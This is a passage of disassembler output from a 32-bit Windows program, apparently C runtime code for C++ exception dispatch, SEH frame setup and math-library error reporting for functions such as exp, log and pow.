; ---------------------------------------------------------------------------
loc_4138A5: ; DATA XREF: .text:0041C148�o
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov [ebp+var_3C], eax
mov eax, [ebp+var_3C]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_4138DD
mov eax, [ebp+var_3C]
cmp dword ptr [eax+10h], 3
jnz short loc_4138DD
mov eax, [ebp+var_3C]
cmp dword ptr [eax+14h], 19930520h
jnz short loc_4138DD
mov eax, [ebp+var_3C]
cmp dword ptr [eax+1Ch], 0
mov [ebp+var_40], 1
jz short loc_4138E4
loc_4138DD: ; CODE XREF: sub_41382B+8B�j
; sub_41382B+94�j ...
mov [ebp+var_40], 0
loc_4138E4: ; CODE XREF: sub_41382B+B0�j
mov eax, [ebp+var_40]
retn
; ---------------------------------------------------------------------------
loc_4138E8: ; DATA XREF: .text:0041C14C�o
mov esp, [ebp+ms_exc.old_esp]
mov ecx, [ebp+arg_C]
mov eax, [ecx+8]
mov [ebp+var_44], eax
mov edi, [ebp+arg_4]
mov eax, [edi+8]
mov [ebp+var_48], eax
mov edx, [ecx+10h]
mov [ebp+var_4C], edx
xor edx, edx
loc_413905: ; CODE XREF: sub_41382B+130�j
mov [ebp+var_50], edx
cmp edx, [ecx+0Ch]
jnb short loc_413931
lea esi, [edx+edx*4]
mov ebx, [ebp+var_4C]
lea esi, [ebx+esi*4]
mov ebx, [esi+4]
cmp eax, ebx
jle short loc_41395A
cmp eax, [esi+8]
jg short loc_41395A
lea eax, [ebx+1]
mov [ebp+var_48], eax
mov edx, [ebp+var_44]
mov eax, [edx+eax*8]
mov [ebp+var_48], eax
loc_413931: ; CODE XREF: sub_41382B+E0�j
push eax
push ecx
xor esi, esi
push esi
push edi
call sub_41370C
add esp, 10h
mov [ebp+var_1C], esi
mov [ebp+ms_exc.disabled], esi
mov esi, [ebp+arg_0]
loc_413948: ; CODE XREF: sub_41382B+75�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_413963
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_41382B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41382B
loc_41395A: ; CODE XREF: sub_41382B+F0�j
; sub_41382B+F5�j
inc edx
jmp short loc_413905
; END OF FUNCTION CHUNK FOR sub_41382B
; =============== S U B R O U T I N E =======================================
sub_41395D proc near ; DATA XREF: .text:stru_41C138�o
mov edi, [ebp+0Ch]
mov esi, [ebp+8]
sub_41395D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_413963 proc near ; CODE XREF: sub_41382B+121�p
mov eax, [ebp-24h]
mov [edi-4], eax
push dword ptr [ebp-30h]
call sub_40F00A
pop ecx
mov eax, [ebp-34h]
mov dword_4C59B0, eax
mov eax, [ebp-38h]
mov dword_4C59B4, eax
cmp dword ptr [esi], 0E06D7363h
jnz short locret_4139C0
cmp dword ptr [esi+10h], 3
jnz short locret_4139C0
cmp dword ptr [esi+14h], 19930520h
jnz short locret_4139C0
cmp dword ptr [ebp-20h], 0
jnz short locret_4139C0
cmp dword ptr [ebp-1Ch], 0
jz short locret_4139C0
push dword ptr [esi+18h]
call sub_40EFEF
pop ecx
test eax, eax
jz short locret_4139C0
call sub_40F1EE
push eax
push esi
call sub_4137C9
pop ecx
pop ecx
locret_4139C0: ; CODE XREF: sub_413963+25�j
; sub_413963+2B�j ...
retn
sub_413963 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4139C1 proc near ; CODE XREF: sub_413B3D+D�p
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 8
push offset stru_41C150
call __SEH_prolog
mov esi, ecx
mov eax, [ebp+arg_4]
mov edi, edx
mov ebx, [ebp+arg_0]
mov ecx, [eax+4]
test ecx, ecx
jz loc_413B2B
cmp byte ptr [ecx+8], 0
jz loc_413B2B
mov ecx, [eax+8]
test ecx, ecx
jnz short loc_4139FD
test byte ptr [eax+3], 80h
jz loc_413B2B
loc_4139FD: ; CODE XREF: sub_4139C1+30�j
mov eax, [eax]
test eax, eax
js short loc_413A07
lea edi, [ecx+edi+0Ch]
loc_413A07: ; CODE XREF: sub_4139C1+40�j
and [ebp+ms_exc.disabled], 0
push 1
push dword ptr [ebx+18h]
test al, 8
jz short loc_413A49
call sub_41629D
pop ecx
pop ecx
test eax, eax
jz loc_413B22
push 1
push edi
call sub_4162B9
pop ecx
pop ecx
test eax, eax
jz loc_413B22
mov eax, [ebx+18h]
mov [edi], eax
loc_413A3A: ; CODE XREF: sub_4139C1+D1�j
lea ecx, [esi+8]
call sub_41380E
mov [edi], eax
jmp loc_413B27
; ---------------------------------------------------------------------------
loc_413A49: ; CODE XREF: sub_4139C1+51�j
test byte ptr [esi], 1
jz short loc_413A94
call sub_41629D
pop ecx
pop ecx
test eax, eax
jz loc_413B22
push 1
push edi
call sub_4162B9
pop ecx
pop ecx
test eax, eax
jz loc_413B22
push dword ptr [esi+14h]
push dword ptr [ebx+18h]
push edi
call sub_40F260
add esp, 0Ch
cmp dword ptr [esi+14h], 4
jnz loc_413B27
mov eax, [edi]
test eax, eax
jz loc_413B27
jmp short loc_413A3A
; ---------------------------------------------------------------------------
loc_413A94: ; CODE XREF: sub_4139C1+8B�j
cmp dword ptr [esi+18h], 0
jnz short loc_413ACD
call sub_41629D
pop ecx
pop ecx
test eax, eax
jz short loc_413B22
push 1
push edi
call sub_4162B9
pop ecx
pop ecx
test eax, eax
jz short loc_413B22
push dword ptr [esi+14h]
lea ecx, [esi+8]
mov eax, [ebx+18h]
call sub_41380E
push eax
push edi
call sub_40F260
add esp, 0Ch
jmp short loc_413B27
; ---------------------------------------------------------------------------
loc_413ACD: ; CODE XREF: sub_4139C1+D7�j
call sub_41629D
pop ecx
pop ecx
test eax, eax
jz short loc_413B22
push 1
push edi
call sub_4162B9
pop ecx
pop ecx
test eax, eax
jz short loc_413B22
push dword ptr [esi+18h]
call sub_4162D5
pop ecx
test eax, eax
jz short loc_413B22
mov eax, [ebx+18h]
lea ecx, [esi+8]
test byte ptr [esi], 4
jz short loc_413B11
push 1
call sub_41380E
push eax
push dword ptr [esi+18h]
push edi
call sub_40EE38
jmp short loc_413B27
; ---------------------------------------------------------------------------
loc_413B11: ; CODE XREF: sub_4139C1+13B�j
call sub_41380E
push eax
push dword ptr [esi+18h]
push edi
call sub_40EE38
jmp short loc_413B27
; ---------------------------------------------------------------------------
loc_413B22: ; CODE XREF: sub_4139C1+5C�j
; sub_4139C1+6E�j ...
call sub_413F0C
loc_413B27: ; CODE XREF: sub_4139C1+83�j
; sub_4139C1+C1�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_413B2B: ; CODE XREF: sub_4139C1+1B�j
; sub_4139C1+25�j ...
call __SEH_epilog
retn
sub_4139C1 endp
; =============== S U B R O U T I N E =======================================
sub_413B31 proc near ; DATA XREF: .text:stru_41C150�o
xor eax, eax
inc eax
retn
sub_413B31 endp
; ---------------------------------------------------------------------------
loc_413B35: ; DATA XREF: .text:stru_41C150�o
mov esp, [ebp-18h]
jmp sub_413EDF
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413B3D proc near ; CODE XREF: sub_413BA4+A4�p
; sub_413C66+172�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
test ecx, ecx
jz short loc_413B51
push ebx
push [ebp+arg_0]
mov edx, esi
call sub_4139C1
pop ecx
pop ecx
loc_413B51: ; CODE XREF: sub_413B3D+5�j
cmp [ebp+arg_14], 0
push [ebp+arg_0]
jnz short loc_413B5D
push esi
jmp short loc_413B60
; ---------------------------------------------------------------------------
loc_413B5D: ; CODE XREF: sub_413B3D+1B�j
push [ebp+arg_14]
loc_413B60: ; CODE XREF: sub_413B3D+1E�j
call sub_40EE3F
push dword ptr [edi]
push [ebp+arg_C]
push [ebp+arg_8]
push esi
call sub_41370C
mov eax, [edi+4]
push 100h
push [ebp+arg_10]
inc eax
push [ebp+arg_C]
mov [esi+8], eax
push [ebp+arg_4]
mov ecx, [ebx+0Ch]
push esi
push [ebp+arg_0]
call sub_41382B
add esp, 28h
test eax, eax
jz short loc_413BA2
push esi
push eax
call sub_40EE08
loc_413BA2: ; CODE XREF: sub_413B3D+5C�j
pop ebp
retn
sub_413B3D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413BA4 proc near ; CODE XREF: sub_413C66+1C8�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
cmp dword ptr [eax], 80000003h
jz locret_413C64
cmp dword_4C59BC, 0
jz short loc_413BE4
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call sub_40F094
add esp, 1Ch
test eax, eax
jnz locret_413C64
loc_413BE4: ; CODE XREF: sub_413BA4+1B�j
push esi
mov esi, [ebp+arg_14]
push edi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push esi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_40EF5C
mov edi, eax
mov eax, [ebp+var_4]
add esp, 14h
cmp eax, [ebp+var_8]
jnb short loc_413C62
push ebx
loc_413C0B: ; CODE XREF: sub_413BA4+BB�j
cmp esi, [edi]
jl short loc_413C53
cmp esi, [edi+4]
jg short loc_413C53
mov eax, [edi+0Ch]
mov ecx, [edi+10h]
shl eax, 4
add eax, ecx
mov ecx, [eax-0Ch]
test ecx, ecx
jz short loc_413C2C
cmp byte ptr [ecx+8], 0
jnz short loc_413C53
loc_413C2C: ; CODE XREF: sub_413BA4+80�j
mov esi, [ebp+arg_4]
push 1
push [ebp+arg_1C]
lea ebx, [eax-10h]
push [ebp+arg_18]
xor ecx, ecx
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_0]
call sub_413B3D
mov esi, [ebp+arg_14]
add esp, 1Ch
loc_413C53: ; CODE XREF: sub_413BA4+69�j
; sub_413BA4+6E�j ...
inc [ebp+var_4]
mov eax, [ebp+var_4]
add edi, 14h
cmp eax, [ebp+var_8]
jb short loc_413C0B
pop ebx
loc_413C62: ; CODE XREF: sub_413BA4+64�j
pop edi
pop esi
locret_413C64: ; CODE XREF: sub_413BA4+E�j
; sub_413BA4+3A�j
leave
retn
sub_413BA4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413C66 proc near ; CODE XREF: sub_413E3D+93�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = byte ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 24h
mov eax, [ebp+arg_4]
mov eax, [eax+8]
and byte ptr [ebp+var_1C], 0
cmp eax, 0FFFFFFFFh
mov [ebp+var_18], eax
jl short loc_413C86
mov ecx, [ebp+arg_10]
cmp eax, [ecx+4]
jl short loc_413C8B
loc_413C86: ; CODE XREF: sub_413C66+16�j
call sub_413F0C
loc_413C8B: ; CODE XREF: sub_413C66+1E�j
push ebx
mov ebx, [ebp+arg_0]
cmp dword ptr [ebx], 0E06D7363h
push esi
push edi
jnz loc_413E12
cmp dword ptr [ebx+10h], 3
mov edi, 19930520h
jnz short loc_413D0C
cmp [ebx+14h], edi
jnz short loc_413D0C
cmp dword ptr [ebx+1Ch], 0
jnz short loc_413D0C
mov eax, dword_4C59B0
test eax, eax
jz loc_413E0A
mov esi, eax
mov eax, dword_4C59B4
push 1
push esi
mov [ebp+arg_0], esi
mov [ebp+arg_8], eax
mov byte ptr [ebp+var_1C], 1
call sub_41629D
test eax, eax
pop ecx
pop ecx
jnz short loc_413CE4
call sub_413F0C
loc_413CE4: ; CODE XREF: sub_413C66+77�j
cmp dword ptr [esi], 0E06D7363h
jnz loc_413E0F
mov eax, [ebp+arg_0]
cmp dword ptr [eax+10h], 3
jnz short loc_413D09
cmp [eax+14h], edi
jnz short loc_413D09
cmp dword ptr [eax+1Ch], 0
jnz short loc_413D09
call sub_413F0C
loc_413D09: ; CODE XREF: sub_413C66+91�j
; sub_413C66+96�j ...
mov ebx, [ebp+arg_0]
loc_413D0C: ; CODE XREF: sub_413C66+40�j
; sub_413C66+45�j ...
cmp dword ptr [ebx], 0E06D7363h
jnz loc_413E12
cmp dword ptr [ebx+10h], 3
jnz loc_413E12
cmp [ebx+14h], edi
jnz loc_413E12
mov esi, [ebp+var_18]
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_8]
push eax
push esi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_40EF5C
mov ecx, [ebp+var_8]
add esp, 14h
cmp ecx, [ebp+var_20]
mov [ebp+var_4], eax
jnb loc_413DFA
jmp short loc_413D59
; ---------------------------------------------------------------------------
loc_413D56: ; CODE XREF: sub_413C66+18E�j
mov esi, [ebp+var_18]
loc_413D59: ; CODE XREF: sub_413C66+EE�j
cmp [eax], esi
jg loc_413DE5
cmp esi, [eax+4]
jg short loc_413DE5
mov ecx, [eax+0Ch]
test ecx, ecx
mov esi, [eax+10h]
mov [ebp+var_14], ecx
jle short loc_413DE5
loc_413D73: ; CODE XREF: sub_413C66+150�j
mov ecx, [ebx+1Ch]
mov ecx, [ecx+0Ch]
lea edx, [ecx+4]
mov ecx, [ecx]
test ecx, ecx
mov [ebp+var_C], edx
mov [ebp+var_10], ecx
jle short loc_413DAC
loc_413D88: ; CODE XREF: sub_413C66+141�j
mov eax, [ebp+var_C]
mov edi, [eax]
push dword ptr [ebx+1Ch]
mov [ebp+var_24], edi
call sub_4136A4
test eax, eax
pop ecx
jnz short loc_413DBA
dec [ebp+var_10]
add [ebp+var_C], 4
cmp [ebp+var_10], eax
jg short loc_413D88
mov eax, [ebp+var_4]
loc_413DAC: ; CODE XREF: sub_413C66+120�j
dec [ebp+var_14]
add esi, 10h
cmp [ebp+var_14], 0
jg short loc_413D73
jmp short loc_413DE5
; ---------------------------------------------------------------------------
loc_413DBA: ; CODE XREF: sub_413C66+135�j
push [ebp+var_1C]
mov edi, [ebp+var_4]
push [ebp+arg_1C]
mov ecx, [ebp+var_24]
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
mov ebx, esi
mov esi, [ebp+arg_4]
call sub_413B3D
mov ebx, [ebp+arg_0]
add esp, 1Ch
mov eax, edi
loc_413DE5: ; CODE XREF: sub_413C66+F5�j
; sub_413C66+FE�j ...
inc [ebp+var_8]
mov ecx, [ebp+var_8]
add eax, 14h
cmp ecx, [ebp+var_20]
mov [ebp+var_4], eax
jb loc_413D56
loc_413DFA: ; CODE XREF: sub_413C66+E8�j
cmp [ebp+arg_14], 0
jz short loc_413E0A
push 1
push ebx
call sub_4137C9
pop ecx
pop ecx
loc_413E0A: ; CODE XREF: sub_413C66+54�j
; sub_413C66+198�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_413E0F: ; CODE XREF: sub_413C66+84�j
mov ebx, [ebp+arg_0]
loc_413E12: ; CODE XREF: sub_413C66+31�j
; sub_413C66+AC�j ...
cmp [ebp+arg_14], 0
jnz short loc_413E38
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+var_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
call sub_413BA4
add esp, 20h
jmp short loc_413E0A
; ---------------------------------------------------------------------------
loc_413E38: ; CODE XREF: sub_413C66+1B0�j
jmp sub_413EDF
sub_413C66 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413E3D proc near ; CODE XREF: .text:0040EEB2�p
; .text:0040EEE2�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_10]
mov eax, [esi]
push edi
and eax, 1FFFFFFFh
mov edi, 19930520h
cmp eax, edi
jz short loc_413E5A
call sub_413F0C
loc_413E5A: ; CODE XREF: sub_413E3D+16�j
mov eax, [ebp+arg_0]
test byte ptr [eax+4], 66h
jz short loc_413E82
cmp dword ptr [esi+4], 0
jz short loc_413ED8
cmp [ebp+arg_14], 0
jnz short loc_413ED8
push 0FFFFFFFFh
push esi
push [ebp+arg_C]
push [ebp+arg_4]
call sub_41370C
add esp, 10h
jmp short loc_413ED8
; ---------------------------------------------------------------------------
loc_413E82: ; CODE XREF: sub_413E3D+24�j
cmp dword ptr [esi+0Ch], 0
jz short loc_413ED8
cmp dword ptr [eax], 0E06D7363h
jnz short loc_413EBC
cmp [eax+14h], edi
jbe short loc_413EBC
mov ecx, [eax+1Ch]
mov ecx, [ecx+8]
test ecx, ecx
jz short loc_413EBC
movzx edx, byte ptr [ebp+arg_1C]
push edx
push [ebp+arg_18]
push [ebp+arg_14]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call ecx
add esp, 20h
jmp short loc_413EDB
; ---------------------------------------------------------------------------
loc_413EBC: ; CODE XREF: sub_413E3D+51�j
; sub_413E3D+56�j ...
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_1C]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call sub_413C66
add esp, 20h
loc_413ED8: ; CODE XREF: sub_413E3D+2A�j
; sub_413E3D+30�j ...
xor eax, eax
inc eax
loc_413EDB: ; CODE XREF: sub_413E3D+7D�j
pop edi
pop esi
pop ebp
retn
sub_413E3D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413EDF proc near ; CODE XREF: sub_4136F3+14�j
; .text:00413809�j ...
ms_exc = CPPEH_RECORD ptr -18h
; FUNCTION CHUNK AT 004162ED SIZE 00000018 BYTES
push 8
push offset stru_41C160
call __SEH_prolog
mov eax, dword_4C59C0
test eax, eax
jz short loc_413F07
and [ebp+ms_exc.disabled], 0
call eax
jmp short loc_413F03
; ---------------------------------------------------------------------------
loc_413EFC: ; DATA XREF: .text:stru_41C160�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_413F00: ; DATA XREF: .text:stru_41C160�o
mov esp, [ebp+ms_exc.old_esp]
loc_413F03: ; CODE XREF: sub_413EDF+1B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_413F07: ; CODE XREF: sub_413EDF+13�j
jmp loc_4162ED
sub_413EDF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413F0C proc near ; CODE XREF: sub_40EF5C+23�p
; sub_40EF5C:loc_40EFC6�p ...
ms_exc = CPPEH_RECORD ptr -18h
push 8
push offset stru_41C170
call __SEH_prolog
mov eax, off_421508
test eax, eax
jz short loc_413F34
and [ebp+ms_exc.disabled], 0
call eax ; sub_413EDF
jmp short loc_413F30
; ---------------------------------------------------------------------------
loc_413F29: ; DATA XREF: .text:stru_41C170�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_413F2D: ; DATA XREF: .text:stru_41C170�o
mov esp, [ebp+ms_exc.old_esp]
loc_413F30: ; CODE XREF: sub_413F0C+1B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_413F34: ; CODE XREF: sub_413F0C+13�j
jmp sub_413EDF
sub_413F0C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413F40 proc near ; CODE XREF: sub_40F043+3D�p
; sub_41370C+62�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 4
push ebx
push ecx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebp
push [ebp+arg_8]
mov ecx, [ebp+arg_8]
mov ebp, [ebp+var_4]
call sub_40F211
push esi
push edi
call eax
pop edi
pop esi
mov ebx, ebp
pop ebp
mov ecx, [ebp+arg_8]
push ebp
mov ebp, ebx
cmp ecx, 100h
jnz short loc_413F7F
mov ecx, 2
loc_413F7F: ; CODE XREF: sub_413F40+38�j
push ecx
call sub_40F211
pop ebp
pop ecx
pop ebx
leave
retn 0Ch
sub_413F40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413F8C proc near ; CODE XREF: sub_40F5A0+B5�p
; sub_40F710+B5�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = qword ptr -1Ch
var_14 = qword ptr -14h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 24h
mov eax, dword_421360
xor eax, [ebp+4]
mov ecx, 0A1h
mov [ebp+var_4], eax
mov eax, [ebp+arg_C]
cmp eax, ecx
push esi
jg loc_4140C1
jz loc_4140B5
cmp eax, 18h
jg loc_414045
jz short loc_414032
push 2
pop ecx
sub eax, ecx
jz short loc_414023
dec eax
jz short loc_414017
sub eax, 5
jz short loc_414008
dec eax
jz short loc_413FFC
sub eax, 5
jz short loc_413FE9
dec eax
jnz loc_414210
mov [ebp+var_20], offset aExp ; "exp"
jmp loc_414086
; ---------------------------------------------------------------------------
loc_413FE9: ; CODE XREF: sub_413F8C+48�j
mov [ebp+var_24], 3
mov [ebp+var_20], offset aExp ; "exp"
jmp loc_414148
; ---------------------------------------------------------------------------
loc_413FFC: ; CODE XREF: sub_413F8C+43�j
mov [ebp+var_20], offset aLog10 ; "log10"
jmp loc_4141AE
; ---------------------------------------------------------------------------
loc_414008: ; CODE XREF: sub_413F8C+40�j
mov [ebp+var_24], ecx
mov [ebp+var_20], offset aLog10 ; "log10"
jmp loc_414148
; ---------------------------------------------------------------------------
loc_414017: ; CODE XREF: sub_413F8C+3B�j
mov [ebp+var_20], offset aLog_0 ; "log"
jmp loc_4141AE
; ---------------------------------------------------------------------------
loc_414023: ; CODE XREF: sub_413F8C+38�j
mov [ebp+var_24], ecx
mov [ebp+var_20], offset aLog_0 ; "log"
jmp loc_414148
; ---------------------------------------------------------------------------
loc_414032: ; CODE XREF: sub_413F8C+31�j
mov [ebp+var_24], 3
loc_414039: ; CODE XREF: sub_413F8C+E5�j
mov [ebp+var_20], offset aPow ; "pow"
jmp loc_414148
; ---------------------------------------------------------------------------
loc_414045: ; CODE XREF: sub_413F8C+2B�j
sub eax, 19h
jz short loc_41407F
dec eax
jz short loc_414073
dec eax
jz short loc_41406A
dec eax
jz loc_4141A7
dec eax
jnz loc_414210
mov [ebp+var_20], offset aPow ; "pow"
jmp loc_4141CF
; ---------------------------------------------------------------------------
loc_41406A: ; CODE XREF: sub_413F8C+C2�j
mov [ebp+var_24], 2
jmp short loc_414039
; ---------------------------------------------------------------------------
loc_414073: ; CODE XREF: sub_413F8C+BF�j
mov eax, [ebp+arg_8]
fld1
fstp qword ptr [eax]
jmp loc_414210
; ---------------------------------------------------------------------------
loc_41407F: ; CODE XREF: sub_413F8C+BC�j
mov [ebp+var_20], offset aPow ; "pow"
loc_414086: ; CODE XREF: sub_413F8C+58�j
mov eax, [ebp+arg_0]
fld qword ptr [eax]
mov eax, [ebp+arg_4]
mov esi, [ebp+arg_8]
fstp [ebp+var_1C]
fld qword ptr [eax]
lea eax, [ebp+var_24]
fstp [ebp+var_14]
push eax
fld qword ptr [esi]
mov [ebp+var_24], 4
fstp [ebp+var_C]
call off_421510
pop ecx
jmp loc_41420B
; ---------------------------------------------------------------------------
loc_4140B5: ; CODE XREF: sub_413F8C+22�j
mov [ebp+var_24], 3
jmp loc_414141
; ---------------------------------------------------------------------------
loc_4140C1: ; CODE XREF: sub_413F8C+1C�j
mov ecx, 3EAh
cmp eax, ecx
jg loc_41418B
jz loc_414182
sub eax, 0A2h
jz short loc_41413A
sub eax, 4
jz short loc_41412A
sub eax, 4
jz short loc_41411A
dec eax
jz short loc_41410E
sub eax, 33Dh
jz short loc_414102
dec eax
jnz loc_414210
mov [ebp+var_20], offset aLog10 ; "log10"
jmp loc_4141CF
; ---------------------------------------------------------------------------
loc_414102: ; CODE XREF: sub_413F8C+161�j
mov [ebp+var_20], offset aLog_0 ; "log"
jmp loc_4141CF
; ---------------------------------------------------------------------------
loc_41410E: ; CODE XREF: sub_413F8C+15A�j
mov [ebp+var_20], offset aLog2 ; "log2"
jmp loc_4141AE
; ---------------------------------------------------------------------------
loc_41411A: ; CODE XREF: sub_413F8C+157�j
mov [ebp+var_24], 2
mov [ebp+var_20], offset aLog2 ; "log2"
jmp short loc_414148
; ---------------------------------------------------------------------------
loc_41412A: ; CODE XREF: sub_413F8C+152�j
mov [ebp+var_24], 3
mov [ebp+var_20], offset aExp10 ; "exp10"
jmp short loc_414148
; ---------------------------------------------------------------------------
loc_41413A: ; CODE XREF: sub_413F8C+14D�j
mov [ebp+var_24], 4
loc_414141: ; CODE XREF: sub_413F8C+130�j
mov [ebp+var_20], offset aExp2 ; "exp2"
loc_414148: ; CODE XREF: sub_413F8C+6B�j
; sub_413F8C+86�j ...
mov eax, [ebp+arg_0]
fld qword ptr [eax]
mov eax, [ebp+arg_4]
mov esi, [ebp+arg_8]
fstp [ebp+var_1C]
fld qword ptr [eax]
lea eax, [ebp+var_24]
fstp [ebp+var_14]
push eax
fld qword ptr [esi]
fstp [ebp+var_C]
call off_421510
test eax, eax
pop ecx
jnz loc_41420B
mov dword_4C5904, 22h
jmp loc_41420B
; ---------------------------------------------------------------------------
loc_414182: ; CODE XREF: sub_413F8C+142�j
mov [ebp+var_20], offset aExp ; "exp"
jmp short loc_4141CF
; ---------------------------------------------------------------------------
loc_41418B: ; CODE XREF: sub_413F8C+13C�j
sub eax, 3EBh
jz short loc_4141C8
dec eax
jz short loc_4141BF
dec eax
jz short loc_4141B6
dec eax
jz short loc_4141A7
dec eax
jnz short loc_414210
mov [ebp+var_20], offset aModf ; "modf"
jmp short loc_4141CF
; ---------------------------------------------------------------------------
loc_4141A7: ; CODE XREF: sub_413F8C+C5�j
; sub_413F8C+20D�j
mov [ebp+var_20], offset aPow ; "pow"
loc_4141AE: ; CODE XREF: sub_413F8C+77�j
; sub_413F8C+92�j ...
mov eax, [ebp+arg_0]
mov esi, [ebp+arg_8]
jmp short loc_4141D9
; ---------------------------------------------------------------------------
loc_4141B6: ; CODE XREF: sub_413F8C+20A�j
mov [ebp+var_20], offset aFloor ; "floor"
jmp short loc_4141CF
; ---------------------------------------------------------------------------
loc_4141BF: ; CODE XREF: sub_413F8C+207�j
mov [ebp+var_20], offset aCeil ; "ceil"
jmp short loc_4141CF
; ---------------------------------------------------------------------------
loc_4141C8: ; CODE XREF: sub_413F8C+204�j
mov [ebp+var_20], offset aAtan ; "atan"
loc_4141CF: ; CODE XREF: sub_413F8C+D9�j
; sub_413F8C+171�j ...
mov eax, [ebp+arg_0]
fld qword ptr [eax]
mov esi, [ebp+arg_8]
fstp qword ptr [esi]
loc_4141D9: ; CODE XREF: sub_413F8C+228�j
fld qword ptr [eax]
mov eax, [ebp+arg_4]
fstp [ebp+var_1C]
mov [ebp+var_24], 1
fld qword ptr [eax]
lea eax, [ebp+var_24]
fstp [ebp+var_14]
push eax
fld qword ptr [esi]
fstp [ebp+var_C]
call off_421510
test eax, eax
pop ecx
jnz short loc_41420B
mov dword_4C5904, 21h
loc_41420B: ; CODE XREF: sub_413F8C+124�j
; sub_413F8C+1E1�j ...
fld [ebp+var_C]
fstp qword ptr [esi]
loc_414210: ; CODE XREF: sub_413F8C+4B�j
; sub_413F8C+CC�j ...
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop esi
call sub_411BA5
leave
retn
sub_413F8C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41421E proc near ; CODE XREF: sub_414253+3A�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_41C238
call __SEH_prolog
and [ebp+var_1C], 0
and [ebp+ms_exc.disabled], 0
movapd xmm0, xmm1
mov [ebp+var_1C], 1
jmp short loc_414246
; ---------------------------------------------------------------------------
loc_41423F: ; DATA XREF: .text:stru_41C238�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_414243: ; DATA XREF: .text:stru_41C238�o
mov esp, [ebp+ms_exc.old_esp]
loc_414246: ; CODE XREF: sub_41421E+1F�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_41421E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414253 proc near ; DATA XREF: .text:0041E020�o
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 4
push ebx
